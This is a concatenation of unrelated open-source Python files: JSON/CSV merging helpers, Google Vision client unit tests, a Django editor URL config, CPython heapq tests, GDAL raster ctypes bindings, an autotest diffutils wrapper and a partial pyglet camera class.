if attribute == 'hsrp' and item:
item = str(item)
r[attribute] = item
result[key] = r
return result
def save_dict_as_json(dict, filename):
with open(filename, 'w') as fp:
json.dump(dict, fp, indent=4)
def save_dict_as_csv(jdict, filename, attributes=None, sort_by=None, group_by=None):
keylist = list(jdict.keys())
if attributes is None:
attributes = list(jdict[keylist[0]].keys())
if sort_by:
emptys = [key for key in keylist if not jdict[key][sort_by]]
keylist = [key for key in keylist if jdict[key][sort_by]]
keylist = sorted(keylist, key=lambda i: jdict[i][sort_by])
keylist.extend(emptys)
if group_by:
keylist2 = copy(keylist)
keylist = []
while keylist2:
key = keylist2.pop(0)
keylist.append(key)
if jdict[key][group_by]:
group_id = jdict[key][group_by]
group = []
for key in keylist2:
if jdict[key][group_by] == group_id:
group.append(key)
keylist.extend(group)
for key in group:
keylist2.remove(key)
with open(filename, 'w') as fp:
f = csv.writer(fp)
f.writerow(attributes)
for key in keylist:
item = jdict[key]
row = []
for attribute in attributes:
value = ''
if attribute in item.keys():
value = item[attribute]
# if isinstance(value, list):
# value = '; '.join(value) # TODO doesnt work if value is a list of lists or tuples
row.append(value)
if "lan_ips" in item.keys():
row.extend(item["lan_ips"])
f.writerow(row)
def create_empty_template(json_object):
if isinstance(json_object, dict):
r = {}
for key, value in json_object.items():
r[key] = create_empty_template(value)
return r
if isinstance(json_object, list):
r = []
for value in json_object:
i = create_empty_template(value)
if i:
r.append(i)
return r
if isinstance(json_object, str): # or isinstance(json_object, unicode):
return ''
if isinstance(json_object, int) or isinstance(json_object, float):
return 0
def copy_json_object(json_object1, json_object2, attributes=None, key_prepend=''):
"""copy attributes from json_object2 to json_object1
- prepend the keys with key_prepend
"""
if attributes is None:
attributes = json_object2.keys()
for attribute in attributes:
key1 = key_prepend + attribute
if key1 in json_object1.keys():
if json_object1[key1] and not json_object2[attribute]:
continue
json_object1[key1] = json_object2[attribute]
def combine(dict1, dict2, match_function, key_prepend='', verbose=False):
"""combine the json_objects in dict1 with dict2
- match_function(json_object, dict2) will return the best matching json_object from dict2
- dict1 will contain all the combined jsons
- the keys of the copied items will be prepended with the key_prepend
- ?? mismatching items will be stored in dict1['mismatch']
- todo: add not used items from dict2
"""
# empty_json_object2 = create_empty_template(dict2[dict2.keys()[0]])
empty_json_object2 = create_empty_template(dict2[list(dict2.keys())[0]])
if verbose:
keylist = tqdm(dict1.keys())
else:
keylist = dict1.keys()
for key1 in keylist:
json_object1 = dict1[key1]
json_object2 = match_function(json_object1, dict2)
if not json_object2:
json_object2 = empty_json_object2
copy_json_object(json_object1, json_object2, key_prepend=key_prepend)
def combine2(dict1, dict2, match_function, key_prepend=''):
"""combine the json_objects in dict1 with dict2 and create a new dict
- match_function(json_object, dict2) will return the best matching json_object from dict2
- dict1 will contain all the combined jsons
- the keys of the copied items will be prepended with the key_prepend
- ?? mismatching items will be stored in dict1['mismatch']
- todo: add not used items from dict2
"""
keys2 = list(dict2.keys())
# empty_json_object1 = create_empty_template(dict1.values()[0])
# empty_json_object2 = create_empty_template(dict2.values()[0])
empty_json_object2 = create_empty_template(dict2[list(dict2.keys())[0]])
empty_json_object1 = create_empty_template(dict1[list(dict1.keys())[0]])
for key1, json_object1 in dict1.items():
json_object2 = empty_json_object2
key2 = match_function(json_object1, dict2)
if key2:
json_object2 = dict2[key2]
if key2 in keys2:
keys2.remove(key2)
copy_json_object(json_object1, json_object2, key_prepend=key_prepend)
for i, key2 in enumerate(keys2):
json_object1 = copy(empty_json_object1)
json_object2 = dict2[key2]
copy_json_object(json_object1, json_object2, key_prepend=key_prepend)
dict1['mismatch'+str(i)] = json_object1
def combine3(dict1, dict2, score_function, key_prepend='', add_unused=True, verbose=False, unknown='unknown'):
"""combine best match from dict2 to dict1 based on a score.
For each item in dict1 the best possible candidate from dict2 is combined.
- Calculates for each combination of items in dict1 and dict2 the score
- For each item from dict1 all the possible candidates are selected from dict2
based on max(score).
- For each candidate from dict2 the max(score) to all items in dict1 is calculated.
If these max(score)'s are identical there is a fit.
      If not, the candidate in dict2 has a better fit to another dict1 item.
"""
empty_json_object1 = create_empty_template(dict1[list(dict1.keys())[0]])
empty_json_object2 = create_empty_template(dict2[list(dict2.keys())[0]])
# empty_json_object1 = create_empty_template(dict1.values()[0])
# empty_json_object2 = create_empty_template(dict2.values()[0])
keys1 = list(dict1.keys())
keys2 = list(dict2.keys())
used_keys2 = []
scores_matrix = []
candidates = {}
if verbose:
keylist = tqdm(keys1)
else:
keylist = keys1
for k1 in keylist:
# create matrix row
row = []
for k2 in keys2:
score = score_function(dict1[k1], dict2[k2])
row.append(score)
scores_matrix.append(row)
# find max scoring elements from dict2 as candidates for dict1[k1]
candidates[k1] = []
max_score = max(row)
# find k2's for that score
if max_score > 0:
for i, (k2, score) in enumerate(zip(keys2, row)):
if score == max_score:
candidates[k1].append((i, k2, score))
for k1 in keys1:
json_object1 = dict1[k1]
json_object2 = empty_json_object2
for i, k2, score in candidates[k1]:
keys2_column = column(scores_matrix, i)
max_score = max(keys2_column)
if max_score == score:
json_object2 = dict2[k2]
used_keys2.append(k2)
copy_json_object(json_object1, json_object2, key_prepend=key_prepend)
if add_unused:
# unused values from dict2 will be added in dict1 with a key 'unknown##'
# where ## is a sequence nr
# first find any 'unknown##' keys in dict1
# and determine the starting value
unknowns_in_keys1 = [k for k in keys1 if k.startswith(unknown)]
l = len(unknown)
unknown_numbers_in_keys1 = [int(k[l:]) for k in unknowns_in_keys1]
if unknown_numbers_in_keys1:
start_unknown_value = max(unknown_numbers_in_keys1)+1
else:
start_unknown_value = 1
unused_keys2 = list(set(keys2)-set(used_keys2))
for i, key2 in enumerate(unused_keys2, start=start_unknown_value):
json_object1 = copy(empty_json_object1)
json_object2 = dict2[key2]
copy_json_object(json_object1, json_object2, key_prepend=key_prepend)
dict1[unknown+str(i)] = json_object1
def column(matrix, i):
return [row[i] for row in matrix]
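# Illustrative sketch (kept as comments, not executed): how combine3 is meant
# to be driven. The dicts, the 'name'/'extra' fields and the score function
# below are invented for this example and are not part of the real data model.
#
#     def name_score(obj1, obj2):
#         return 1 if obj1.get('name') == obj2.get('name') else 0
#
#     dict1 = {'a': {'name': 'x'}, 'b': {'name': 'y'}}
#     dict2 = {'p': {'name': 'x', 'extra': 1}, 'q': {'name': 'z', 'extra': 2}}
#     combine3(dict1, dict2, name_score, key_prepend='src2_')
#     # dict1['a'] is combined with dict2['p']; the unmatched dict2['q'] is
#     # added to dict1 under an 'unknown<n>' key because add_unused is True.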
| mit |
tseaver/gcloud-python | vision/tests/unit/gapic/v1p3beta1/test_image_annotator_client_v1p3beta1.py | 1 | 4686 | # -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests."""
import pytest
from google.rpc import status_pb2
from google.cloud import vision_v1p3beta1
from google.cloud.vision_v1p3beta1.proto import image_annotator_pb2
from google.longrunning import operations_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
def __init__(self, responses=[]):
self.responses = responses
self.requests = []
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestImageAnnotatorClient(object):
def test_batch_annotate_images(self):
# Setup Expected Response
expected_response = {}
expected_response = image_annotator_pb2.BatchAnnotateImagesResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = vision_v1p3beta1.ImageAnnotatorClient(channel=channel)
# Setup Request
requests = []
response = client.batch_annotate_images(requests)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = image_annotator_pb2.BatchAnnotateImagesRequest(
requests=requests)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_batch_annotate_images_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = vision_v1p3beta1.ImageAnnotatorClient(channel=channel)
# Setup request
requests = []
with pytest.raises(CustomException):
client.batch_annotate_images(requests)
def test_async_batch_annotate_files(self):
# Setup Expected Response
expected_response = {}
expected_response = image_annotator_pb2.AsyncBatchAnnotateFilesResponse(
**expected_response)
operation = operations_pb2.Operation(
name='operations/test_async_batch_annotate_files', done=True)
operation.response.Pack(expected_response)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = vision_v1p3beta1.ImageAnnotatorClient(channel=channel)
# Setup Request
requests = []
response = client.async_batch_annotate_files(requests)
result = response.result()
assert expected_response == result
assert len(channel.requests) == 1
expected_request = image_annotator_pb2.AsyncBatchAnnotateFilesRequest(
requests=requests)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_async_batch_annotate_files_exception(self):
# Setup Response
error = status_pb2.Status()
operation = operations_pb2.Operation(
name='operations/test_async_batch_annotate_files_exception',
done=True)
operation.error.CopyFrom(error)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = vision_v1p3beta1.ImageAnnotatorClient(channel=channel)
# Setup Request
requests = []
response = client.async_batch_annotate_files(requests)
exception = response.exception()
assert exception.errors[0] == error
| apache-2.0 |
kmaglione/olympia | apps/editors/urls.py | 13 | 3948 | from django.conf.urls import url
from addons.urls import ADDON_ID
from editors import views, views_themes
# All URLs under /editors/
urlpatterns = (
url(r'^$', views.home, name='editors.home'),
url(r'^queue$', views.queue, name='editors.queue'),
url(r'^queue/nominated$', views.queue_nominated,
name='editors.queue_nominated'),
url(r'^queue/pending$', views.queue_pending,
name='editors.queue_pending'),
url(r'^queue/preliminary$', views.queue_prelim,
name='editors.queue_prelim'),
url(r'^queue/fast$', views.queue_fast_track,
name='editors.queue_fast_track'),
url(r'^queue/reviews$', views.queue_moderated,
name='editors.queue_moderated'),
url(r'^queue/application_versions\.json$', views.application_versions_json,
name='editors.application_versions_json'),
url(r'^unlisted_queue$', views.unlisted_queue,
name='editors.unlisted_queue'),
url(r'^unlisted_queue/nominated$', views.unlisted_queue_nominated,
name='editors.unlisted_queue_nominated'),
url(r'^unlisted_queue/pending$', views.unlisted_queue_pending,
name='editors.unlisted_queue_pending'),
url(r'^unlisted_queue/preliminary$', views.unlisted_queue_prelim,
name='editors.unlisted_queue_prelim'),
url(r'^logs$', views.eventlog, name='editors.eventlog'),
url(r'^log/(\d+)$', views.eventlog_detail, name='editors.eventlog.detail'),
url(r'^reviewlog$', views.reviewlog, name='editors.reviewlog'),
url(r'^beta_signed_log$', views.beta_signed_log,
name='editors.beta_signed_log'),
url(r'^queue_version_notes/%s?$' % ADDON_ID, views.queue_version_notes,
name='editors.queue_version_notes'),
url(r'^queue_viewing$', views.queue_viewing,
name='editors.queue_viewing'),
url(r'^review_viewing$', views.review_viewing,
name='editors.review_viewing'),
url(r'^review/%s$' % ADDON_ID, views.review, name='editors.review'),
url(r'^performance/(?P<user_id>\d+)?$', views.performance,
name='editors.performance'),
url(r'^motd$', views.motd, name='editors.motd'),
url(r'^motd/save$', views.save_motd, name='editors.save_motd'),
url(r'^abuse-reports/%s$' % ADDON_ID, views.abuse_reports,
name='editors.abuse_reports'),
url(r'^leaderboard/$', views.leaderboard, name='editors.leaderboard'),
url(r'^whiteboard/%s$' % ADDON_ID, views.whiteboard,
name='editors.whiteboard'),
url('^themes$', views_themes.home,
name='editors.themes.home'),
url('^themes/pending$', views_themes.themes_list,
name='editors.themes.list'),
url('^themes/flagged$', views_themes.themes_list,
name='editors.themes.list_flagged',
kwargs={'flagged': True}),
url('^themes/updates$', views_themes.themes_list,
name='editors.themes.list_rereview',
kwargs={'rereview': True}),
url('^themes/queue/$', views_themes.themes_queue,
name='editors.themes.queue_themes'),
url('^themes/queue/flagged$', views_themes.themes_queue_flagged,
name='editors.themes.queue_flagged'),
url('^themes/queue/updates$', views_themes.themes_queue_rereview,
name='editors.themes.queue_rereview'),
url('^themes/queue/commit$', views_themes.themes_commit,
name='editors.themes.commit'),
url('^themes/queue/single/(?P<slug>[^ /]+)$', views_themes.themes_single,
name='editors.themes.single'),
url('^themes/history/(?P<username>[^ /]+)?$',
views_themes.themes_history, name='editors.themes.history'),
url(r'^themes/logs$', views_themes.themes_logs,
name='editors.themes.logs'),
url('^themes/release$', views_themes.release_locks,
name='editors.themes.release_locks'),
url('^themes/logs/deleted/$', views_themes.deleted_themes,
name='editors.themes.deleted'),
url('^themes/search/$', views_themes.themes_search,
name='editors.themes.search'),
)
| bsd-3-clause |
MicroTrustRepos/microkernel | src/l4/pkg/python/contrib/Lib/test/test_heapq.py | 56 | 13195 | """Unittests for heapq."""
import random
import unittest
from test import test_support
import sys
# We do a bit of trickery here to be able to test both the C implementation
# and the Python implementation of the module.
# Make it impossible to import the C implementation anymore.
sys.modules['_heapq'] = 0
# We must also handle the case that heapq was imported before.
if 'heapq' in sys.modules:
del sys.modules['heapq']
# Now we can import the module and get the pure Python implementation.
import heapq as py_heapq
# Restore everything to normal.
del sys.modules['_heapq']
del sys.modules['heapq']
# This is now the module with the C implementation.
import heapq as c_heapq
class TestHeap(unittest.TestCase):
module = None
def test_push_pop(self):
# 1) Push 256 random numbers and pop them off, verifying all's OK.
heap = []
data = []
self.check_invariant(heap)
for i in range(256):
item = random.random()
data.append(item)
self.module.heappush(heap, item)
self.check_invariant(heap)
results = []
while heap:
item = self.module.heappop(heap)
self.check_invariant(heap)
results.append(item)
data_sorted = data[:]
data_sorted.sort()
self.assertEqual(data_sorted, results)
# 2) Check that the invariant holds for a sorted array
self.check_invariant(results)
self.assertRaises(TypeError, self.module.heappush, [])
try:
self.assertRaises(TypeError, self.module.heappush, None, None)
self.assertRaises(TypeError, self.module.heappop, None)
except AttributeError:
pass
def check_invariant(self, heap):
# Check the heap invariant.
for pos, item in enumerate(heap):
if pos: # pos 0 has no parent
parentpos = (pos-1) >> 1
self.assert_(heap[parentpos] <= item)
def test_heapify(self):
for size in range(30):
heap = [random.random() for dummy in range(size)]
self.module.heapify(heap)
self.check_invariant(heap)
self.assertRaises(TypeError, self.module.heapify, None)
def test_naive_nbest(self):
data = [random.randrange(2000) for i in range(1000)]
heap = []
for item in data:
self.module.heappush(heap, item)
if len(heap) > 10:
self.module.heappop(heap)
heap.sort()
self.assertEqual(heap, sorted(data)[-10:])
def heapiter(self, heap):
# An iterator returning a heap's elements, smallest-first.
try:
while 1:
yield self.module.heappop(heap)
except IndexError:
pass
def test_nbest(self):
# Less-naive "N-best" algorithm, much faster (if len(data) is big
# enough <wink>) than sorting all of data. However, if we had a max
# heap instead of a min heap, it could go faster still via
# heapify'ing all of data (linear time), then doing 10 heappops
# (10 log-time steps).
data = [random.randrange(2000) for i in range(1000)]
heap = data[:10]
self.module.heapify(heap)
for item in data[10:]:
if item > heap[0]: # this gets rarer the longer we run
self.module.heapreplace(heap, item)
self.assertEqual(list(self.heapiter(heap)), sorted(data)[-10:])
self.assertRaises(TypeError, self.module.heapreplace, None)
self.assertRaises(TypeError, self.module.heapreplace, None, None)
self.assertRaises(IndexError, self.module.heapreplace, [], None)
def test_nbest_with_pushpop(self):
data = [random.randrange(2000) for i in range(1000)]
heap = data[:10]
self.module.heapify(heap)
for item in data[10:]:
self.module.heappushpop(heap, item)
self.assertEqual(list(self.heapiter(heap)), sorted(data)[-10:])
self.assertEqual(self.module.heappushpop([], 'x'), 'x')
def test_heappushpop(self):
h = []
x = self.module.heappushpop(h, 10)
self.assertEqual((h, x), ([], 10))
h = [10]
x = self.module.heappushpop(h, 10.0)
self.assertEqual((h, x), ([10], 10.0))
self.assertEqual(type(h[0]), int)
self.assertEqual(type(x), float)
        h = [10]
        x = self.module.heappushpop(h, 9)
        self.assertEqual((h, x), ([10], 9))
        h = [10]
x = self.module.heappushpop(h, 11)
self.assertEqual((h, x), ([11], 10))
def test_heapsort(self):
# Exercise everything with repeated heapsort checks
for trial in xrange(100):
size = random.randrange(50)
data = [random.randrange(25) for i in range(size)]
if trial & 1: # Half of the time, use heapify
heap = data[:]
self.module.heapify(heap)
else: # The rest of the time, use heappush
heap = []
for item in data:
self.module.heappush(heap, item)
heap_sorted = [self.module.heappop(heap) for i in range(size)]
self.assertEqual(heap_sorted, sorted(data))
def test_merge(self):
inputs = []
for i in xrange(random.randrange(5)):
row = sorted(random.randrange(1000) for j in range(random.randrange(10)))
inputs.append(row)
self.assertEqual(sorted(chain(*inputs)), list(self.module.merge(*inputs)))
self.assertEqual(list(self.module.merge()), [])
def test_merge_stability(self):
class Int(int):
pass
inputs = [[], [], [], []]
for i in range(20000):
stream = random.randrange(4)
x = random.randrange(500)
obj = Int(x)
obj.pair = (x, stream)
inputs[stream].append(obj)
for stream in inputs:
stream.sort()
result = [i.pair for i in self.module.merge(*inputs)]
self.assertEqual(result, sorted(result))
def test_nsmallest(self):
data = [(random.randrange(2000), i) for i in range(1000)]
for f in (None, lambda x: x[0] * 547 % 2000):
for n in (0, 1, 2, 10, 100, 400, 999, 1000, 1100):
self.assertEqual(self.module.nsmallest(n, data), sorted(data)[:n])
self.assertEqual(self.module.nsmallest(n, data, key=f),
sorted(data, key=f)[:n])
def test_nlargest(self):
data = [(random.randrange(2000), i) for i in range(1000)]
for f in (None, lambda x: x[0] * 547 % 2000):
for n in (0, 1, 2, 10, 100, 400, 999, 1000, 1100):
self.assertEqual(self.module.nlargest(n, data),
sorted(data, reverse=True)[:n])
self.assertEqual(self.module.nlargest(n, data, key=f),
sorted(data, key=f, reverse=True)[:n])
class TestHeapPython(TestHeap):
module = py_heapq
class TestHeapC(TestHeap):
module = c_heapq
def test_comparison_operator(self):
# Issue 3501: Make sure heapq works with both __lt__ and __le__
def hsort(data, comp):
data = map(comp, data)
self.module.heapify(data)
return [self.module.heappop(data).x for i in range(len(data))]
class LT:
def __init__(self, x):
self.x = x
def __lt__(self, other):
return self.x > other.x
class LE:
def __init__(self, x):
self.x = x
def __le__(self, other):
return self.x >= other.x
data = [random.random() for i in range(100)]
target = sorted(data, reverse=True)
self.assertEqual(hsort(data, LT), target)
self.assertEqual(hsort(data, LE), target)
#==============================================================================
class LenOnly:
"Dummy sequence class defining __len__ but not __getitem__."
def __len__(self):
return 10
class GetOnly:
"Dummy sequence class defining __getitem__ but not __len__."
def __getitem__(self, ndx):
return 10
class CmpErr:
"Dummy element that always raises an error during comparison"
def __cmp__(self, other):
raise ZeroDivisionError
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def next(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def next(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing next()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def next(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def next(self):
raise StopIteration
from itertools import chain, imap
def L(seqn):
'Test multiple tiers of iterators'
return chain(imap(lambda x:x, R(Ig(G(seqn)))))
class TestErrorHandling(unittest.TestCase):
# only for C implementation
module = c_heapq
def test_non_sequence(self):
for f in (self.module.heapify, self.module.heappop):
self.assertRaises(TypeError, f, 10)
for f in (self.module.heappush, self.module.heapreplace,
self.module.nlargest, self.module.nsmallest):
self.assertRaises(TypeError, f, 10, 10)
def test_len_only(self):
for f in (self.module.heapify, self.module.heappop):
self.assertRaises(TypeError, f, LenOnly())
for f in (self.module.heappush, self.module.heapreplace):
self.assertRaises(TypeError, f, LenOnly(), 10)
for f in (self.module.nlargest, self.module.nsmallest):
self.assertRaises(TypeError, f, 2, LenOnly())
def test_get_only(self):
for f in (self.module.heapify, self.module.heappop):
self.assertRaises(TypeError, f, GetOnly())
for f in (self.module.heappush, self.module.heapreplace):
self.assertRaises(TypeError, f, GetOnly(), 10)
for f in (self.module.nlargest, self.module.nsmallest):
self.assertRaises(TypeError, f, 2, GetOnly())
    def test_cmp_err(self):
seq = [CmpErr(), CmpErr(), CmpErr()]
for f in (self.module.heapify, self.module.heappop):
self.assertRaises(ZeroDivisionError, f, seq)
for f in (self.module.heappush, self.module.heapreplace):
self.assertRaises(ZeroDivisionError, f, seq, 10)
for f in (self.module.nlargest, self.module.nsmallest):
self.assertRaises(ZeroDivisionError, f, 2, seq)
def test_arg_parsing(self):
for f in (self.module.heapify, self.module.heappop,
self.module.heappush, self.module.heapreplace,
self.module.nlargest, self.module.nsmallest):
self.assertRaises(TypeError, f, 10)
def test_iterable_args(self):
for f in (self.module.nlargest, self.module.nsmallest):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, L, R):
self.assertEqual(f(2, g(s)), f(2,s))
self.assertEqual(f(2, S(s)), [])
self.assertRaises(TypeError, f, 2, X(s))
self.assertRaises(TypeError, f, 2, N(s))
self.assertRaises(ZeroDivisionError, f, 2, E(s))
#==============================================================================
def test_main(verbose=None):
from types import BuiltinFunctionType
test_classes = [TestHeapPython, TestHeapC, TestErrorHandling]
test_support.run_unittest(*test_classes)
# verify reference counting
if verbose and hasattr(sys, "gettotalrefcount"):
import gc
counts = [None] * 5
for i in xrange(len(counts)):
test_support.run_unittest(*test_classes)
gc.collect()
counts[i] = sys.gettotalrefcount()
print counts
if __name__ == "__main__":
test_main(verbose=True)
| gpl-2.0 |
vslavik/bakefile | tests/conftest.py | 1 | 1534 | #
# This file is part of Bakefile (http://bakefile.org)
#
# Copyright (C) 2008-2013 Vaclav Slavik
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
def pytest_configure(config):
import sys, os.path
tests_path = os.path.dirname(__file__)
bkl_path = os.path.normpath(os.path.join(tests_path, '..', 'src'))
sys.path = [bkl_path, tests_path] + sys.path
import logging
log_level = logging.DEBUG if config.getvalue("debug") else logging.WARNING
logging.basicConfig(level=log_level)
| mit |
MRigal/django | django/contrib/gis/gdal/prototypes/raster.py | 320 | 4013 | """
This module houses the ctypes function prototypes for GDAL DataSource (raster)
related data structures.
"""
from ctypes import POINTER, c_char_p, c_double, c_int, c_void_p
from functools import partial
from django.contrib.gis.gdal.libgdal import GDAL_VERSION, std_call
from django.contrib.gis.gdal.prototypes.generation import (
const_string_output, double_output, int_output, void_output,
voidptr_output,
)
# For more detail about c function names and definitions see
# http://gdal.org/gdal_8h.html
# http://gdal.org/gdalwarper_8h.html
# Prepare partial functions that use cpl error codes
void_output = partial(void_output, cpl=True)
const_string_output = partial(const_string_output, cpl=True)
double_output = partial(double_output, cpl=True)
# Raster Driver Routines
register_all = void_output(std_call('GDALAllRegister'), [])
get_driver = voidptr_output(std_call('GDALGetDriver'), [c_int])
get_driver_by_name = voidptr_output(std_call('GDALGetDriverByName'), [c_char_p], errcheck=False)
get_driver_count = int_output(std_call('GDALGetDriverCount'), [])
get_driver_description = const_string_output(std_call('GDALGetDescription'), [c_void_p])
# Raster Data Source Routines
create_ds = voidptr_output(std_call('GDALCreate'), [c_void_p, c_char_p, c_int, c_int, c_int, c_int, c_void_p])
open_ds = voidptr_output(std_call('GDALOpen'), [c_char_p, c_int])
if GDAL_VERSION >= (2, 0):
close_ds = voidptr_output(std_call('GDALClose'), [c_void_p])
else:
close_ds = void_output(std_call('GDALClose'), [c_void_p])
flush_ds = int_output(std_call('GDALFlushCache'), [c_void_p])
copy_ds = voidptr_output(std_call('GDALCreateCopy'),
[c_void_p, c_char_p, c_void_p, c_int, POINTER(c_char_p), c_void_p, c_void_p]
)
add_band_ds = void_output(std_call('GDALAddBand'), [c_void_p, c_int])
get_ds_description = const_string_output(std_call('GDALGetDescription'), [c_void_p])
get_ds_driver = voidptr_output(std_call('GDALGetDatasetDriver'), [c_void_p])
get_ds_xsize = int_output(std_call('GDALGetRasterXSize'), [c_void_p])
get_ds_ysize = int_output(std_call('GDALGetRasterYSize'), [c_void_p])
get_ds_raster_count = int_output(std_call('GDALGetRasterCount'), [c_void_p])
get_ds_raster_band = voidptr_output(std_call('GDALGetRasterBand'), [c_void_p, c_int])
get_ds_projection_ref = const_string_output(std_call('GDALGetProjectionRef'), [c_void_p])
set_ds_projection_ref = void_output(std_call('GDALSetProjection'), [c_void_p, c_char_p])
get_ds_geotransform = void_output(std_call('GDALGetGeoTransform'), [c_void_p, POINTER(c_double * 6)], errcheck=False)
set_ds_geotransform = void_output(std_call('GDALSetGeoTransform'), [c_void_p, POINTER(c_double * 6)])
# Raster Band Routines
band_io = void_output(std_call('GDALRasterIO'),
[c_void_p, c_int, c_int, c_int, c_int, c_int, c_void_p, c_int, c_int, c_int, c_int, c_int]
)
get_band_xsize = int_output(std_call('GDALGetRasterBandXSize'), [c_void_p])
get_band_ysize = int_output(std_call('GDALGetRasterBandYSize'), [c_void_p])
get_band_index = int_output(std_call('GDALGetBandNumber'), [c_void_p])
get_band_description = const_string_output(std_call('GDALGetDescription'), [c_void_p])
get_band_ds = voidptr_output(std_call('GDALGetBandDataset'), [c_void_p])
get_band_datatype = int_output(std_call('GDALGetRasterDataType'), [c_void_p])
get_band_nodata_value = double_output(std_call('GDALGetRasterNoDataValue'), [c_void_p, POINTER(c_int)])
set_band_nodata_value = void_output(std_call('GDALSetRasterNoDataValue'), [c_void_p, c_double])
get_band_minimum = double_output(std_call('GDALGetRasterMinimum'), [c_void_p, POINTER(c_int)])
get_band_maximum = double_output(std_call('GDALGetRasterMaximum'), [c_void_p, POINTER(c_int)])
# Reprojection routine
reproject_image = void_output(std_call('GDALReprojectImage'),
[c_void_p, c_char_p, c_void_p, c_char_p, c_int, c_double, c_double, c_void_p, c_void_p, c_void_p]
)
auto_create_warped_vrt = voidptr_output(std_call('GDALAutoCreateWarpedVRT'),
[c_void_p, c_char_p, c_char_p, c_int, c_double, c_void_p]
)
| bsd-3-clause |
rajashreer7/autotest-client-tests | linux-tools/diffutils/diffutils.py | 4 | 1176 | #!/bin/python
import os, subprocess
import logging
from autotest.client import test
from autotest.client.shared import error
class diffutils(test.test):
"""
Autotest module for testing basic functionality
of diffutils
@author Shoji Sugiyama ([email protected])
"""
version = 1
nfail = 0
path = ''
def initialize(self):
"""
Sets the overall failure counter for the test.
"""
self.nfail = 0
logging.info('\n Test initialize successfully')
def run_once(self, test_path=''):
"""
Trigger test run
"""
try:
os.environ["LTPBIN"] = "%s/shared" %(test_path)
ret_val = subprocess.call(test_path + '/diffutils' + '/diffutils.sh', shell=True)
if ret_val != 0:
self.nfail += 1
except error.CmdError, e:
self.nfail += 1
logging.error("Test Failed: %s", e)
def postprocess(self):
if self.nfail != 0:
logging.info('\n nfails is non-zero')
raise error.TestError('\nTest failed')
else:
logging.info('\n Test completed successfully ')
| gpl-2.0 |
vickenty/ookoobah | ookoobah/camera.py | 1 | 2347 | from __future__ import division
from pyglet.gl import *
from random import uniform
from euclid import Vector3
from spring import Spring
class Camera (object):
SPEED = 0.1
CLIP = 0.01
def __init__(self, eye, center, up):
self.eye = Spring(eye, self.SPEED, self.CLIP)
self.vec = Spring(center - eye, self.SPEED, self.CLIP)
self.up = Spring(up, self.SPEED, self.CLIP)
self.ofs = Spring(0, 0.1, 0.01)
self.modelview = (GLdouble * 16)()
self.projection = (GLdouble * 16)()
self.viewport = (GLint * 4)()
self.unproj = [GLdouble(), GLdouble(), GLdouble()]
def resize(self, x, y, w, h):
glViewport(x, y, w, h)
self.viewport[:] = (x, y, w, h)
glMatrixMode(gl.GL_PROJECTION)
glLoadIdentity()
glu.gluPerspective(45.0, w / h, 0.1, 50)
glMatrixMode(gl.GL_MODELVIEW)
def move(self, eye, center, up):
self.eye.next_value = eye
self.vec.next_value = center - eye
self.up.next_value = up
def shake(self, amount):
self.ofs.value = amount
def tick(self):
self.eye.tick()
self.vec.tick()
self.up.tick()
self.ofs.tick()
def setup(self):
